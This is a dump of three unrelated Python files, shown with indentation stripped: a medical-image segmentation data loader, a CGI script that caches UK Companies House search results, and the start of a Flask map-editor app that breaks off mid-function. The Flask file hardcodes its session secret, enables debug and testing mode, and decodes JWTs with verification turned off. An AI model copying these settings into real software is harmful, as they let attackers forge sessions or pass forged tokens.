seg_data_loader_onfly.py
from __future__ import print_function, division
import blosc
import torch
from torch.utils.data import Dataset
from data_pre.seg_data_utils import *
from data_pre.transform import Transform
import SimpleITK as sitk
from multiprocessing import *
blosc.set_nthreads(1)
import progressbar as pb
from copy import deepcopy
import random
import time
class SegmentationDataset(Dataset):
"""segmentation dataset.
if the data are loaded into memory, we provide data processing options such as image resampling and label filtering
if not, for efficiency, we assume the data are preprocessed; image resampling still works but label filtering is disabled
"""
def __init__(self, data_path,phase, transform=None, option = None):
"""
:param data_path: string, path to processed data
:param transform: function, apply transform on data
"""
self.data_path = data_path
self.phase = phase
self.transform = transform
ind = ['train', 'val', 'test', 'debug'].index(phase)
max_num_for_loading=option['max_num_for_loading',(-1,-1,-1,-1),"the max number of pairs to be loaded, set -1 if there is no constraint,[max_train, max_val, max_test, max_debug]"]
self.max_num_for_loading = max_num_for_loading[ind]
self.has_label = False
self.get_file_list()
self.seg_option = option['seg']
self.img_after_resize = option[('img_after_resize', [-1, -1, -1], "numpy coordinate, resample the image into desired size")]
self.normalize_via_percentage_clip = option[('normalize_via_percentage_clip',-1,"normalize the image via percentage clip, the given value is in [0-1]")]
self.normalize_via_range_clip = option[('normalize_via_range_clip',(-1,-1),"normalize the image via range clip")]
self.img_after_resize = None if any([sz == -1 for sz in self.img_after_resize]) else self.img_after_resize
self.patch_size = self.seg_option['patch_size']
self.interested_label_list = self.seg_option['interested_label_list',[-1],"the label to be evaluated, the label not in list will be turned into 0 (background)"]
self.interested_label_list = None if any([label == -1 for label in self.interested_label_list]) else self.interested_label_list
self.transform_name_seq = self.seg_option['transform']['transform_seq']
self.option_p = self.seg_option[('partition', {}, "settings for the partition")]
self.use_whole_img_as_input = self.seg_option[('use_whole_img_as_input',False,"use whole image as the input")]
self.load_into_memory = True
self.img_list = []
self.img_sz_list = []
self.original_spacing_list = []
self.original_sz_list = []
self.spacing_list = []
self.label_org_index_list = []
self.label_converted_index_list = []
self.label_density_list = []
if self.load_into_memory:
self.init_img_pool()
print('img pool initialization complete')
if self.phase=='train':
self.init_corr_transform_pool()
print('transform pool initialization complete')
else:
self.init_corr_partition_pool()
print("partition pool initialized complete")
blosc.set_nthreads(1)
def get_file_list(self):
"""
get all files belonging to data_type from the data_path
:return: full file path list, file name list
"""
if not os.path.exists(self.data_path):
self.path_list = []
self.name_list = []
self.init_weight_list = []
return
self.path_list = read_txt_into_list(os.path.join(self.data_path, 'file_path_list.txt'))
if len(self.path_list[0]) == 2:
self.has_label = True
elif self.phase in ["train", "val", "debug"]:
raise ValueError("the label must be provided during training")
if not self.has_label:
self.path_list= [[path] for path in self.path_list]
file_name_path = os.path.join(self.data_path, 'file_name_list.txt')
if os.path.isfile(file_name_path):
self.name_list = read_txt_into_list(file_name_path)
else:
self.name_list = [get_file_name(self.path_list[i][0]) for i in range(len(self.path_list))]
if self.max_num_for_loading>0:
read_num = min(self.max_num_for_loading, len(self.path_list))
if self.phase=='train':
index =list(range(len(self.path_list)))
random.shuffle(index)
self.path_list = [self.path_list[ind] for ind in index ]
self.name_list = [self.name_list[ind] for ind in index ]
self.path_list = self.path_list[:read_num]
self.name_list = self.name_list[:read_num]
# if len(self.name_list)==0:
# self.name_list = ['img_{}'.format(idx) for idx in range(len(self.path_list))]
self.num_img = len(self.name_list)
def __read_img_label_into_zipnp(self,img_label_path_dic,img_label_dic):
pbar = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar(), pb.ETA()], maxval=len(img_label_path_dic)).start()
count = 0
for fn, img_label_path in img_label_path_dic.items():
img_label_np_dic = {}
img_sitk, original_spacing, original_sz = self.__read_and_clean_itk_info(img_label_path['image'])
resized_img, resize_factor = self.resize_img(img_sitk)
img_np = sitk.GetArrayFromImage(resized_img)
img_np = self.normalize_intensity(img_np)
img_label_np_dic['image'] = blosc.pack_array(img_np.astype(np.float32))
if self.has_label:
label_sitk, _, _ = self.__read_and_clean_itk_info(img_label_path['label'])
resized_label,_ = self.resize_img(label_sitk,is_label=True)
label_np = sitk.GetArrayFromImage(resized_label)
label_index = list(np.unique(label_np))
img_label_np_dic['label'] = blosc.pack_array(label_np.astype(np.int64))
img_label_np_dic['label_index'] = label_index
img_after_resize = self.img_after_resize if self.img_after_resize is not None else original_sz
new_spacing= original_spacing*(original_sz-1)/(np.array(img_after_resize)-1)
normalized_spacing = self._normalize_spacing(new_spacing,img_after_resize, silent_mode=True)
img_label_np_dic['original_sz'] =original_sz
img_label_np_dic['original_spacing'] = original_spacing
img_label_np_dic['spacing'] = normalized_spacing
img_label_np_dic['img_sz'] = list(img_np.shape)
img_label_dic[fn] =img_label_np_dic
count +=1
pbar.update(count)
pbar.finish()
def _normalize_spacing(self,spacing,sz,silent_mode=False):
"""
Normalizes spacing.
:param spacing: Vector with spacing info, in XxYxZ format
:param sz: size vector in XxYxZ format
:return: vector with normalized spacings in XxYxZ format
"""
dim = len(spacing)
# first determine the largest extent
current_largest_extent = -1
extent = np.zeros_like(spacing)
for d in range(dim):
current_extent = spacing[d]*(sz[d]-1)
extent[d] = current_extent
if current_extent>current_largest_extent:
current_largest_extent = current_extent
scalingFactor = 1./current_largest_extent
normalized_spacing = spacing*scalingFactor
normalized_extent = extent*scalingFactor
if not silent_mode:
print('Normalize spacing: ' + str(spacing) + ' -> ' + str(normalized_spacing))
print('Normalize spacing, extent: ' + str(extent) + ' -> ' + str(normalized_extent))
return normalized_spacing
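# Worked example (a sketch with made-up numbers): for spacing [1., 1., 2.] and size
# [100, 100, 50], the per-dimension extents are [1*99, 1*99, 2*49] = [99., 99., 98.].
# The largest extent is 99, so scalingFactor = 1/99 and the normalized spacing becomes
# roughly [0.0101, 0.0101, 0.0202], i.e. the largest physical extent is mapped to 1.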
def __convert_to_standard_label_map(self, label_map, interested_label_list):
label_map =blosc.unpack_array(label_map)
cur_label_list = list(np.unique(label_map)) # unique func orders the elements
if set(cur_label_list) == set(interested_label_list):
return label_map
for l_id in cur_label_list:
if l_id in interested_label_list:
st_index = interested_label_list.index(l_id)
else:
# assume background label is 0
st_index = 0
print("warning label: {} is not in interested label index, and would be convert to 0".format(l_id))
label_map[np.where(label_map == l_id)] = st_index
return label_map
def __get_clean_label(self,img_label_dict, img_name_list):
"""
:param img_label_dict: dict mapping file name to the packed image/label data read by __read_img_label_into_zipnp
:param img_name_list: list of file names to process
:return: the updated img_label_dict with standardized labels, label density and label index info
"""
print(" Attention, the annotation for background is assume to be 0 ! ")
print(" Attention, we are using the union set of the label! ")
if self.interested_label_list is None:
interested_label_set = set()
for i, fname in enumerate(img_name_list):
label_set = img_label_dict[fname]['label_index']
if i ==0:
interested_label_set = set(label_set)
else:
interested_label_set = interested_label_set.union(label_set)
interested_label_list = list(interested_label_set)
else:
interested_label_list = self.interested_label_list
#self.standard_label_index = tuple([int(item) for item in interested_label_list])
for fname in img_name_list:
label = img_label_dict[fname]['label']
label = self.__convert_to_standard_label_map(label, interested_label_list)
label_density = list(np.bincount(label.reshape(-1).astype(np.int32)) / len(label.reshape(-1)))
img_label_dict[fname]['label'] = blosc.pack_array(label)
img_label_dict[fname]['label_density']=label_density
img_label_dict[fname]['label_org_index'] = interested_label_list
img_label_dict[fname]['label_converted_index'] = list(range(len(interested_label_list)))
return img_label_dict
def init_img_pool(self):
"""img pool shoudl include following thing:
img_label_path_dic:{img_name:{'image':img_fp,'label':label_fp,...}
img_label_dic: {img_name:{'image':img_np,'label':label_np},......}
img_list [[s_np,t_np,sl_np,tl_np],....]
only the img_list need to be used by get_item method
"""
use_parallel = self.phase=='train'
if use_parallel:
manager = Manager()
img_label_dic = manager.dict()
img_label_path_dic = {}
img_name_list = []
for i,fps in enumerate(self.path_list):
fn = self.name_list[i]
if fn not in img_label_path_dic:
if self.has_label:
img_label_path_dic[fn] = {'image':fps[0], 'label':fps[1]}
else:
img_label_path_dic[fn] = {'image':fps[0]}
img_name_list.append(fn)
num_of_workers = 4
num_of_workers = num_of_workers if len(self.name_list)>12 else 2
split_dict = self.__split_dict(img_label_path_dic,num_of_workers)
procs =[]
for i in range(num_of_workers):
p = Process(target=self.__read_img_label_into_zipnp,args=(split_dict[i], img_label_dic,))
p.start()
print("pid:{} start:".format(p.pid))
procs.append(p)
for p in procs:
p.join()
print("the loading phase finished, total {} img and labels have been loaded".format(len(img_label_dic)))
img_label_dic=dict(img_label_dic) # todo uncomment manager.dict
else:
img_label_dic=dict()
img_label_path_dic = {}
img_name_list = []
for i,fps in enumerate(self.path_list):
fn = self.name_list[i]
if fn not in img_label_path_dic:
if self.has_label:
img_label_path_dic[fn] = {'image': fps[0], 'label': fps[1]}
else:
img_label_path_dic[fn] = {'image': fps[0]}
img_name_list.append(fn)
self.__read_img_label_into_zipnp(img_label_path_dic, img_label_dic) #todo dels
self.get_organize_structure(img_label_dic,img_name_list)
def get_organize_structure(self, img_label_dic, img_name_list):
if self.has_label:
img_label_dic = self.__get_clean_label(img_label_dic, img_name_list)
for fname in img_name_list:
if self.has_label:
self.img_list.append([img_label_dic[fname]['image'],
img_label_dic[fname]['label']])
else:
self.img_list.append([img_label_dic[fname]['image']])
self.img_sz_list.append(img_label_dic[fname]['img_sz'])
self.original_spacing_list.append(img_label_dic[fname]['original_spacing'])
self.original_sz_list.append(img_label_dic[fname]['original_sz'])
self.spacing_list.append(img_label_dic[fname]['spacing'])
if self.has_label:
self.label_org_index_list.append(img_label_dic[fname]['label_org_index'])
self.label_converted_index_list.append(img_label_dic[fname]['label_converted_index'])
self.label_density_list.append(img_label_dic[fname]['label_density'])
# self.img_list = np.array(self.img_list)
# self.img_sz_list = np.array(self.img_sz_list)
# self.original_spacing_list = np.array(self.original_spacing_list)
# self.original_sz_list = np.array(self.original_sz_list)
# self.spacing_list = np.array(self.spacing_list)
# self.label_org_index_list = np.array(self.label_org_index_list)
# self.label_converted_index_list = np.array(self.label_converted_index_list)
# self.label_density_list = np.array(self.label_density_list)
def resize_img(self, img, is_label=False):
"""
:param img: sitk image input; the resize factor is output_size / input_size
:return: the resampled image and the resize factor
"""
img_sz = img.GetSize()
if self.img_after_resize is not None:
img_after_resize = self.img_after_resize
else:
img_after_resize = np.flipud(img_sz)
resize_factor = np.array(img_after_resize) / np.flipud(img_sz)
resize = not all([factor == 1 for factor in resize_factor])
if resize:
resampler = sitk.ResampleImageFilter()
dimension = 3
factor = np.flipud(resize_factor)
affine = sitk.AffineTransform(dimension)
matrix = np.array(affine.GetMatrix()).reshape((dimension, dimension))
after_size = [round(img_sz[i] * factor[i]) for i in range(dimension)]
after_size = [int(sz) for sz in after_size]
matrix[0, 0] = 1. / factor[0]
matrix[1, 1] = 1. / factor[1]
matrix[2, 2] = 1. / factor[2]
affine.SetMatrix(matrix.ravel())
resampler.SetSize(after_size)
resampler.SetTransform(affine)
if is_label:
resampler.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resampler.SetInterpolator(sitk.sitkBSpline)
img_resampled = resampler.Execute(img)
else:
img_resampled = img
return img_resampled, resize_factor
def normalize_intensity(self, img):
"""
normalize the intensities of a numpy image
:param img: image
if self.normalize_via_percentage_clip > 0: linearly normalize intensities so that the 95th percentile gets mapped to 0.95; 0 stays 0
if self.normalize_via_range_clip is set: clip intensities to (range_clip[0], range_clip[1]), linearly map them to [0, 1] and then to [-1, 1]
:return: the normalized image
"""
if self.normalize_via_percentage_clip>0:
img = img - img.min()
normalized_img = img / np.percentile(img, 95) * 0.95
else:
range_clip = self.normalize_via_range_clip
if range_clip[0]<range_clip[1]:
img = np.clip(img,a_min=range_clip[0], a_max=range_clip[1])
min_intensity = img.min()
max_intensity = img.max()
normalized_img = (img - img.min()) / (max_intensity - min_intensity)
normalized_img = normalized_img * 2 - 1
return normalized_img
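# Worked example (a sketch with made-up numbers): with normalize_via_range_clip = (0, 2000),
# the image is first clipped to [0, 2000]; a clipped voxel value of 500, with observed
# min 0 and max 2000 in the clipped image, becomes (500 - 0) / (2000 - 0) = 0.25, which the
# final *2 - 1 step maps to -0.5.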
def __read_and_clean_itk_info(self, path):
if path is not None:
img = sitk.ReadImage(path)
spacing_sitk = img.GetSpacing()
img_sz_sitk = img.GetSize()
return sitk.GetImageFromArray(sitk.GetArrayFromImage(img)), np.flipud(spacing_sitk), np.flipud(img_sz_sitk)
else:
return None, None, None
def __read_itk_into_np(self, path):
return sitk.GetArrayFromImage(sitk.ReadImage(path))
def __split_dict(self, dict_to_split, split_num):
index_list = list(range(len(dict_to_split)))
index_split = np.array_split(np.array(index_list), split_num)
split_dict = []
dict_to_split_items = list(dict_to_split.items())
for i in range(split_num):
dj = dict(dict_to_split_items[index_split[i][0]:index_split[i][-1] + 1])
split_dict.append(dj)
return split_dict
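# Worked example (a sketch): splitting a dict with 10 entries over split_num = 4 workers
# uses np.array_split(range(10), 4), which yields index chunks of sizes 3, 3, 2 and 2,
# so the resulting sub-dicts cover items [0:3], [3:6], [6:8] and [8:10].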
def __convert_np_to_itk_coord(self,coord_list):
return list(np.flipud(np.array(coord_list)))
def get_transform_seq(self,i):
option_trans = deepcopy(self.seg_option['transform'])
option_trans['shared_info']['label_list'] = self.label_converted_index_list[i]
option_trans['shared_info']['label_density'] = self.label_density_list[i]
option_trans['shared_info']['img_size'] = self.__convert_np_to_itk_coord(self.img_sz_list[i])
option_trans['shared_info']['num_crop_per_class_per_train_img'] = self.seg_option['num_crop_per_class_per_train_img']
option_trans['my_bal_rand_crop']['scale_ratio'] = self.seg_option['transform']['my_bal_rand_crop']['scale_ratio']
option_trans['patch_size'] = self.__convert_np_to_itk_coord(self.seg_option['patch_size'])
transform = Transform(option_trans)
return transform.get_transform_seq(self.transform_name_seq)
def apply_transform(self,sample, transform_seq, rand_label_id=-1):
for transform in transform_seq:
sample = transform(sample, rand_label_id)
return sample
def init_corr_transform_pool(self):
self.corr_transform_pool = [self.get_transform_seq(i) for i in range(self.num_img)]
def init_corr_partition_pool(self):
from data_pre.partition import partition
patch_sz_itk =self.__convert_np_to_itk_coord(self.seg_option['patch_size'])
overlap_sz_itk =self.__convert_np_to_itk_coord(self.option_p['overlap_size'])
self.corr_partition_pool = [deepcopy(partition(self.option_p,patch_sz_itk,overlap_sz_itk)) for _ in range(self.num_img)]
def __len__(self):
if self.phase == "train":
if not self.use_whole_img_as_input:
return len(self.name_list)*1000  # artificially lengthen a training epoch; __getitem__ maps idx back via idx % self.num_img
else:
return len(self.name_list)
else:
return len(self.name_list)
def __getitem__(self, idx):
"""
:param idx: id of the items
:return: the processed data, return as type of dic
"""
random_state = np.random.RandomState(int(time.time()))
rand_label_id =random_state.randint(0,1000)+idx
idx = idx%self.num_img
filename = self.name_list[idx]
zipnp_list = self.img_list[idx]
spacing = self.spacing_list[idx]
original_spacing = self.original_spacing_list[idx]
original_sz = self.original_sz_list[idx]
if self.has_label:
img_np, label_np = [blosc.unpack_array(item) for item in zipnp_list]
else:
img_np = blosc.unpack_array(zipnp_list[0])
img_path = self.path_list[idx]
img_shape = img_np.shape
if self.phase=="train":
sample = {'image': [img_np], 'label': label_np}  # the list is for multi-modality; each modality is an element in the list
sample = self.apply_transform(sample,self.corr_transform_pool[idx],rand_label_id)
else:
if not self.has_label:
sample = {'image': [img_np]}
else:
sample = {'image': [img_np], 'label':label_np}
if not self.use_whole_img_as_input:
sample = self.corr_partition_pool[idx](sample)
else:
sample['image'] = np.stack(sample['image'], 0)
sample['image'] = np.stack(sample['image'], 0)
sample['img_path'] = img_path
if self.transform:
sample['image'] = self.transform(sample['image'])
if self.has_label:
sample['label'] = self.transform(sample['label'])
sample['spacing'] = spacing.copy()
sample["image_after_resize"] =np.array(img_shape)
sample['original_sz'] = original_sz.copy()
sample['original_spacing'] = original_spacing.copy()
return sample, filename
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample):
n_tensor = torch.from_numpy(sample)
return n_tensor
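# A minimal usage sketch (hypothetical, not part of the original module): it assumes an
# `option` config object supporting the option[('key', default, "description")] access
# pattern used above, and a data_path containing file_path_list.txt.
#
#   from torch.utils.data import DataLoader
#
#   dataset = SegmentationDataset(data_path='./data/train', phase='train',
#                                 transform=ToTensor(), option=option)
#   loader = DataLoader(dataset, batch_size=2, shuffle=True, num_workers=0)
#   for sample, filename in loader:
#       patches = sample['image']  # stacked image patch(es) for this item
#       break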
index.py
#!/usr/bin/pypy3
#!/usr/bin/python3
from http.client import HTTPSConnection
from base64 import b64encode
import json
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
import cgi
class ukcompanieshouse:
URL = 'api.companieshouse.gov.uk'
KEY = ''
def __init__(self):
basic_auth = b64encode((self.KEY+':').encode(encoding='ascii', errors='ignore')).decode("ascii")
self.headers = {'Authorization' : 'Basic {}'.format(basic_auth)}
def api(self, req):
c = HTTPSConnection(self.URL)
c.request('GET', req, headers=self.headers)
return c.getresponse().read().decode('utf-8', errors='ignore')
def search(self, keyword):
res = self.api('/search/companies?q={}&items_per_page=10'.format(keyword.replace(' ', '%20')))
results = [[company['title'],company['company_number']] for company in json.loads(res)['items']]
return results
def filing_history(self, company_number):
res = self.api('/company/{}/filing-history'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def officers(self, company_number):
res = self.api('/company/{}/officers'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def persons_with_significant_control(self, company_number):
res = self.api('/company/{}/persons-with-significant-control'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def exemptions(self, company_number):
res = self.api('/company/{}/exemptions'.format(company_number))
results = json.loads(res)
if 'exemptions' in results:
return results['exemptions']
else:
return {}
def registers(self, company_number):
res = self.api('/company/{}/registers'.format(company_number))
results = json.loads(res)
if 'error' in results:
return {}
else:
return results
def company_profile(self, company_number, recursive=True):
res = self.api('/company/{}'.format(company_number))
results = json.loads(res)
for r in results:
if results[r] == False:
results[r] = 'No'
elif results[r] == True:
results[r] = 'Yes'
if recursive:
results['links']['filing_history'] = self.filing_history(company_number)
results['links']['officers'] = self.officers(company_number)
results['links']['persons_with_significant_control'] = self.persons_with_significant_control(company_number)
results['links']['exemptions'] = self.exemptions(company_number)
results['links']['registers'] = self.registers(company_number)
return {'results': results}
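# A minimal standalone sketch (hypothetical; requires a valid Companies House API key in
# KEY and network access):
#
#   ch = ukcompanieshouse()
#   for title, company_number in ch.search('acme'):
#       print(title, company_number)
#   profile = ch.company_profile(company_number, recursive=False)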
def commit(keyword, results, cursor, cnx):
sql1 = "DELETE FROM ukcompanieshousesearch WHERE keyword=%s;"
sql2 = "INSERT INTO ukcompanieshousesearch VALUES(%s, %s, %s);"
val = (
keyword,
results,
str(datetime.now()))
cursor.execute(sql1, (keyword,))
cnx.commit()
cursor.execute(sql2, val)
cnx.commit()
cursor.close()
cnx.close()
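# Note: the ukcompanieshousesearch table is assumed to have three columns matching the
# INSERT above: the search keyword, the serialized results and a timestamp; the timestamp
# (data[2] in main) is used to decide whether a cached entry has expired (30 days).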
def expected(dump):
# placeholder sanity check on the fetched results; currently accepts everything
return True
def main():
form = cgi.FieldStorage()
keyword = str(form['keyword'].value)
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM ukcompanieshousesearch WHERE keyword=%s;"
cursor.execute(sql, (keyword,))
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=30)) > data[2]:
raise IndexError('item in database expired')
cache_results = data[1]
cursor.close()
cnx.close()
except Exception:
cache_expired = True
company = ukcompanieshouse()
fetch_results = json.dumps(company.search(keyword))
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(keyword, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
app.py
#!/usr/bin/env python
# This work is based on original code developed and copyrighted by TNO 2020.
# Subsequent contributions are licensed to you by the developers of such code and are
# made available to the Project under one or several contributor license agreements.
#
# This work is licensed to you under the Apache License, Version 2.0.
# You may obtain a copy of the license at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Contributors:
# TNO - Initial implementation
# Manager:
# TNO
import importlib
import json
import urllib
import uuid
import traceback
from datetime import datetime
from pprint import pprint
from warnings import warn
import jwt
import requests
from flask import Flask, Response, redirect, render_template, request, send_from_directory, session
from flask_executor import Executor
from flask_oidc import OpenIDConnect
from flask_session import Session
from flask_socketio import SocketIO, emit
from pyecore.ecore import EDate
import src.esdl_config as esdl_config
import src.settings as settings
from esdl import esdl
from esdl.esdl_handler import EnergySystemHandler
from esdl.processing import ESDLAsset, ESDLEcore, ESDLEnergySystem, ESDLGeometry, ESDLQuantityAndUnits
from esdl.processing.ESDLAsset import get_asset_capability_type
from esdl.processing.EcoreDocumentation import EcoreDocumentation
from extensions.bag import BAG
from extensions.boundary_service import BoundaryService
from extensions.es_statistics import ESStatisticsService
from extensions.esdl_api import ESDL_API
from extensions.esdl_browser import ESDLBrowser
from extensions.esdl_compare import ESDLCompare
from extensions.esdl_drive import ESDLDrive
from extensions.esdl_merge import ESDLMerge
from extensions.essim import ESSIM
from extensions.essim_sensitivity import ESSIMSensitivity
from extensions.etm_local import ETMLocal
from extensions.heatnetwork import HeatNetwork
from extensions.ibis import IBISBedrijventerreinen
from extensions.ielgas import IELGAS
from extensions.mapeditor_settings import MAPEDITOR_UI_SETTINGS, MapEditorSettings
from extensions.pico_rooftoppv_potential import PICORooftopPVPotential
from extensions.port_profile_viewer import PortProfileViewer
from extensions.profiles import Profiles
from extensions.session_manager import del_session, delete_sessions_on_disk, get_handler, get_session, \
get_session_for_esid, schedule_session_clean_up, set_handler, set_session, set_session_for_esid, valid_session
from extensions.settings_storage import SettingsStorage
from extensions.shapefile_converter import ShapefileConverter
from extensions.spatial_operations import SpatialOperations
from extensions.time_dimension import TimeDimension
# from extensions.vesta import Vesta
from extensions.workflow import Workflow
from src.asset_draw_toolbar import AssetDrawToolbar
from src.assets_to_be_added import AssetsToBeAdded
from src.datalayer_api import DataLayerAPI
from src.edr_assets import EDRAssets
from src.esdl2shapefile import ESDL2Shapefile
from src.esdl_helper import asset_state_to_ui, generate_profile_info, get_asset_and_coord_from_port_id, \
get_asset_from_port_id, get_connected_to_info, get_port_profile_info, get_tooltip_asset_attrs, \
update_carrier_conn_list, add_spatial_attributes
from src.esdl_services import ESDLServices
from src.essim_kpis import ESSIM_KPIs
from src.essim_validation import validate_ESSIM
from src.log import get_logger
from src.process_es_area_bld import get_building_information, process_energy_system
from src.user_logging import UserLogging
from src.version import __long_version__ as mapeditor_version
from src.view_modes import ViewModes
from src.wms_layers import WMSLayers
from src.table_editor import TableEditor
from src.esdl_file_io import ESDLFileIO
from src.release_notes import ReleaseNotes
from utils.datetime_utils import parse_date
print('MapEditor version {}'.format(mapeditor_version))
logger = get_logger(__name__)
if settings.USE_GEVENT:
import gevent.monkey
gevent.monkey.patch_all()
logger.info("Using GEvent")
#TODO fix send_file in uwsgi
# debugging with pycharm:
#https://stackoverflow.com/questions/21257568/debugging-a-uwsgi-python-application-using-pycharm/25822477
user_actions_logging = UserLogging()
if settings.settings_storage_config["host"] is None or settings.settings_storage_config["host"] == "":
logger.error("Settings storage is not configured. Aborting...")
exit(1)
settings_storage = SettingsStorage(database_uri='mongodb://' + settings.settings_storage_config["host"] + ':' + settings.settings_storage_config["port"])
wms_layers = WMSLayers(settings_storage)
# handler to retrieve ESDL documentation
esdl_doc = EcoreDocumentation(esdlEcoreFile="esdl/esdl.ecore")
def is_running_in_uwsgi():
try:
import uwsgi
a = uwsgi.opt
logger.info("uWSGI startup options: {}".format(a))
return True
except Exception:
return False
# ---------------------------------------------------------------------------------------------------------------------
# Application definition, configuration and setup of simple file server
# ---------------------------------------------------------------------------------------------------------------------
app = Flask(__name__)
app.config['SECRET_KEY'] = b'\xc3g\x19\xbf\x8e\xa0\xe7\xc8\x9a/\xae%\x04g\xbe\x9f\xaex\xb5\x8c\x81f\xaf`' #os.urandom(24) #'secret!'
app.config['SESSION_COOKIE_NAME'] = 'ESDL-WebEditor-session'
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
# app.config['SESSION_COOKIE_SECURE'] = True
app.config['SESSION_PERMANENT'] = True
app.config['SESSION_TYPE'] = 'filesystem'
app.config['PERMANENT_SESSION_LIFETIME'] = 60*60*24 # 1 day in seconds
app.config['SESSION_FILE_DIR'] = '/tmp/flask_session'
app.config['EXECUTOR_PROPAGATE_EXCEPTIONS'] = True # make sure errors are logged for tasks run in threads
logger.info("Socket.IO Async mode: {}".format(settings.ASYNC_MODE))
logger.info('Running inside uWSGI: {}'.format(is_running_in_uwsgi()))
socketio = SocketIO(app, async_mode=settings.ASYNC_MODE, manage_session=False, path='/socket.io', logger=settings.FLASK_DEBUG)
# logging.getLogger('engineio').setLevel(logging.WARNING) # don't print all the messages
# remove existing sessions when restarting, existing sessions will give errors
# as associated ESDLs are not stored in the session and the OpenId connect info is wrong
delete_sessions_on_disk(app.config['SESSION_FILE_DIR'])
# fix sessions with socket.io. see: https://blog.miguelgrinberg.com/post/flask-socketio-and-the-user-session
Session(app)
executor = Executor(app)
#extensions
schedule_session_clean_up()
HeatNetwork(app, socketio)
IBISBedrijventerreinen(app, socketio)
ESDLBrowser(app, socketio, esdl_doc)
BAG(app, socketio)
BoundaryService(app, socketio, settings_storage)
esdl_api = ESDL_API(app, socketio)
ESDLCompare(app, socketio)
ESDLMerge(app, socketio, executor)
essim_kpis = ESSIM_KPIs(app, socketio)
essim = ESSIM(app, socketio, executor, essim_kpis, settings_storage)
ESSIMSensitivity(app, socketio, settings_storage, essim)
# Vesta(app, socketio, settings_storage)
Workflow(app, socketio, settings_storage)
ESStatisticsService(app, socketio)
MapEditorSettings(app, socketio, settings_storage)
profiles = Profiles(app, socketio, executor, settings_storage)
ESDLDrive(app, socketio, executor)
ShapefileConverter(app, socketio, executor)
time_dimension = TimeDimension(app, socketio, executor, settings_storage)
IELGAS(app, socketio, settings_storage)
ETMLocal(app, socketio, settings_storage)
PortProfileViewer(app, socketio, settings_storage)
esdl_services = ESDLServices(app, socketio, settings_storage)
PICORooftopPVPotential(app, socketio)
SpatialOperations(app, socketio)
DataLayerAPI(app, socketio, esdl_doc)
ViewModes(app, socketio, settings_storage)
edr_assets = EDRAssets(app, socketio, settings_storage)
AssetsToBeAdded(app, socketio)
AssetDrawToolbar(app, socketio, settings_storage)
TableEditor(app, socketio, esdl_doc, settings_storage)
ESDLFileIO(app, socketio, executor)
ReleaseNotes(app, socketio, settings_storage)
ESDL2Shapefile(app)
#TODO: check secret key with itsdangerous error and testing and debug here
app.config.update({
'TESTING': True,
'DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_REQUIRE_VERIFIED_EMAIL': False,
'OIDC_USER_INFO_ENABLED': True,
'OIDC_OPENID_REALM': 'esdl-mapeditor',
'OIDC_SCOPES': ['openid', 'email', 'profile', 'groups', 'microprofile-jwt'],
'OIDC_INTROSPECTION_AUTH_METHOD': 'client_secret_post',
'OIDC_CLIENT_SECRETS': settings.OIDC_CLIENT_SECRETS
})
try:
oidc = OpenIDConnect(app)
except Exception as e:
logger.exception("Something went wrong when connecting to Keycloak")
import sys
sys.exit(1)
# TEMPORARY SOLUTION TO DISABLE BROWSER CACHING DURING TESTING
@app.after_request
def add_header(r: Response):
"""
Add headers to prevent browser caching of responses while debugging;
images are still allowed to be cached.
"""
if r.content_type == 'image/png': # images are allowed to be cached.
return r
if settings.FLASK_DEBUG: # only prevent caching when debugging
r.headers["Pragma"] = "no-cache"
r.headers["Expires"] = "0"
r.headers['Cache-Control'] = 'public, max-age=0'
return r
@app.before_request
def before_request():
# store session id
session['client_id'] = request.cookies.get(app.config['SESSION_COOKIE_NAME']) # get cookie id
@app.route('/')
def index():
store_enabled = settings.esdl_store_config or settings.mondaine_hub_config
return render_template('index.html', store_enabled=store_enabled)
"""
# test for OpenID connect authentication against KeyCloak
@app.route('/test')
@oidc.require_login
def test_authentication():
if oidc.user_loggedin:
user_email = oidc.user_getfield('email')
user_groups = oidc.user_getfield('user_group')
logger.debug('user: {}, user groups: {}'.format(user_email, user_groups))
whole_token = oidc.get_access_token()
if whole_token:
jwt_tkn = jwt.decode(whole_token, key=settings.IDM_PUBLIC_KEY, algorithms='RS256', audience='account',
verify=True)
pprint(jwt_tkn)
return jwt_tkn
else:
return "Hello world!"
else:
return "Not logged in"
"""
@app.route('/editor')
@oidc.require_login
def editor():
#session['client_id'] = request.cookies.get(app.config['SESSION_COOKIE_NAME']) # get cookie id
#set_session('client_id', session['client_id'])
logger.info('client_id is set to %s' % session['client_id'])
if oidc.user_loggedin:
if session['client_id'] is None:
warn('WARNING: No client_id in session!!')
whole_token = oidc.get_access_token()
logger.debug(f"whole_token: {whole_token}")
if whole_token:
try:
jwt_tkn = jwt.decode(whole_token, algorithms='RS256', verify=False)
pprint(jwt_tkn)
except Exception as e:
logger.exception(f"error in decoding token: {str(e)}")
# if role in access_token['resource_access'][client]['roles']:
user_email = oidc.user_getfield('email')
logger.info("************* USER LOGIN (" + user_email + ") at " + str(datetime.now()))
user_actions_logging.store_logging(user_email, "login", "", "", "", {})
userinfo = oidc.user_getinfo(['role'])
role = []
if 'role' in userinfo:
role = userinfo['role'].split(',')
# find roles in for the mapeditor client
mapeditor_role = []
client = oidc.client_secrets.get('client_id')
resource_access = oidc.user_getfield('resource_access')
if resource_access is not None and client in resource_access:
if 'roles' in resource_access[client]:
mapeditor_role = resource_access[client]['roles']
